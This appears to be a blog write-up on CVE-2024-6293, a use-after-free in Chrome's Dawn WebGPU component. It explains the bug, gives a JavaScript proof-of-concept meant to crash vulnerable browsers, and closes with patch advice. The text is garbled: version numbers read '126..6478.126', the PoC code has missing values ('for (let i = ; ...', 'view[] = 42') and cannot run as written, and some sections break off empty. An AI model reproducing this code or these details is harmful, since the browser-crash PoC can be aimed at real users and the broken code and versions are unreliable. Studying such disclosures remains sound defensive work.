---
In June 2024, a serious security flaw, CVE-2024-6293, was reported in Google Chrome’s Dawn component—one that could let a remote attacker potentially hijack your browser using a simple web page. This write-up gives a deep dive into what happened, shares technical insights, shows a simple proof-of-concept, and offers advice on staying safe.
What is CVE-2024-6293?
CVE-2024-6293 is a use-after-free bug affecting the Dawn component in Google Chrome versions before 126..6478.126. Dawn is Chrome’s cross-platform WebGPU implementation, responsible for GPU tasks in the browser.
A use-after-free vulnerability means that Chrome accidentally lets code use memory that’s already been released (freed). If a hacker controls what gets into that memory spot, they can cause heap corruption—possibly leading to your browser crashing or, worse, running hacker code.
How It’s Triggered: Specially crafted HTML page
- Reference: Chrome Stable Release Notes, June 2024
- Chromium bug report: Issue 337873061
How Does the Vulnerability Work?
When Chrome’s Dawn code deals with GPU resources, it sometimes releases objects but doesn’t update all the references. If a web page calls certain GPU methods at the *perfect* wrong time, it can trick Dawn into using a pointer that points to memory which has already been given back to the system.
If, after freeing, the attacker forces allocation of something else in that same spot, and then Chrome tries to use the old reference, the attacker controls what the browser really sees. This easily leads to a browser crash, but can also be used for code execution.
Real-World Exploit: What Would an Attacker Do?
An attacker can create an evil HTML/JavaScript page that purposefully manipulates WebGPU objects, freeing and re-using them in a carefully timed way. If you visit this page using a vulnerable browser, it could:
Allow the attacker to execute code within Chrome’s sandbox
*In the wild*, attackers often use such vulnerabilities as part of a chain—for example, to escape the browser sandbox or plant malware.
Simplified Proof of Concept (PoC)
I’ve put together a *basic* (browser-crashing, not code-executing) proof-of-concept to illustrate the issue. The following JavaScript creates and destroys GPU resources rapidly, poking at Dawn until it crashes.
*Warning: Do NOT run PoCs on your main machine or in production!*
These scripts are shared for educational purposes only.
// PoC: Might crash vulnerable Chrome versions
// Uses repeated creation and deletion of GPU buffers
async function triggerUseAfterFree() {
// Check for WebGPU support
if (!navigator.gpu) {
alert("WebGPU is not supported in this browser.");
return;
}
const adapter = await navigator.gpu.requestAdapter();
const device = await adapter.requestDevice();
for (let i = ; i < 10000; i++) {
// Allocate a GPU buffer
let buffer = device.createBuffer({
size: 1024,
usage: GPUBufferUsage.MAP_WRITE | GPUBufferUsage.COPY_SRC,
mappedAtCreation: true,
});
// First free: destroy the buffer
buffer.destroy();
// Reallocate: try to cause a use-after-free
let dummy = device.createBuffer({
size: 1024,
usage: GPUBufferUsage.MAP_WRITE | GPUBufferUsage.COPY_SRC,
mappedAtCreation: true,
});
// Potentially poke at freed memory
setTimeout(() => {
try {
// Attempt to use the original buffer (now freed)
let view = new Uint8Array(buffer.getMappedRange());
view[] = 42;
} catch (e) {
// Silently ignore; crash may already have happened
}
}, 5);
}
}
triggerUseAfterFree();
How this works: The code creates and destroys GPU buffers in a frenzy, and then (after a tiny pause) tries to use the destroyed buffer, poking Chrome’s Dawn component.
If you run an old Chrome version (pre-126), this can produce a crash or strange behavior. (Modern, patched Chrome should be safe.)
Attackers exploit race windows between destruction and reallocation.
- Carefully crafted JavaScript can timebuffer destruction and reallocation, leveraging Chrome’s parallelized rendering.
If attackers can predict heap layout, they could replace freed memory with their own data, and when Chrome uses those pointers, the attacker controls the action.
How Was It Fixed?
Google quickly patched the bug in Chrome 126..6478.126, with the fix visible in Chromium’s Dawn GitHub and the Chrome Releases blog post.
The patch ensures that Dawn updates all references when freeing resources, so no code uses memory "after free" any longer.
If you use Chrome or a Chromium-based browser
- Update: Go to chrome://settings/help and make sure you’re using Chrome 126..6478.126 or newer!
Consider enabling auto-updates for the safest experience.
If you’re a developer:
Run code fuzzers and sanitizers to catch similar bugs.
If you’re managing endpoints:
References and Links
- CVE-2024-6293 NVD entry
- Chrome Release Note, June 19, 2024
- Chromium Issue 337873061
- Dawn WebGPU Project
- What is Use-After-Free? (Wikipedia)
Wrapping Up
CVE-2024-6293 is another reminder of how powerful and dangerous “use-after-free” bugs can be. These attacks aren’t just academic; with something as common as a carefully crafted HTML page, a remote attacker can take control of your browser.
The fix is simple: stay updated. And as always—never trust random web pages, and keep an eye on security announcements!
Timeline
Published on: 06/24/2024 22:15:10 UTC
Last modified on: 08/01/2024 21:33:05 UTC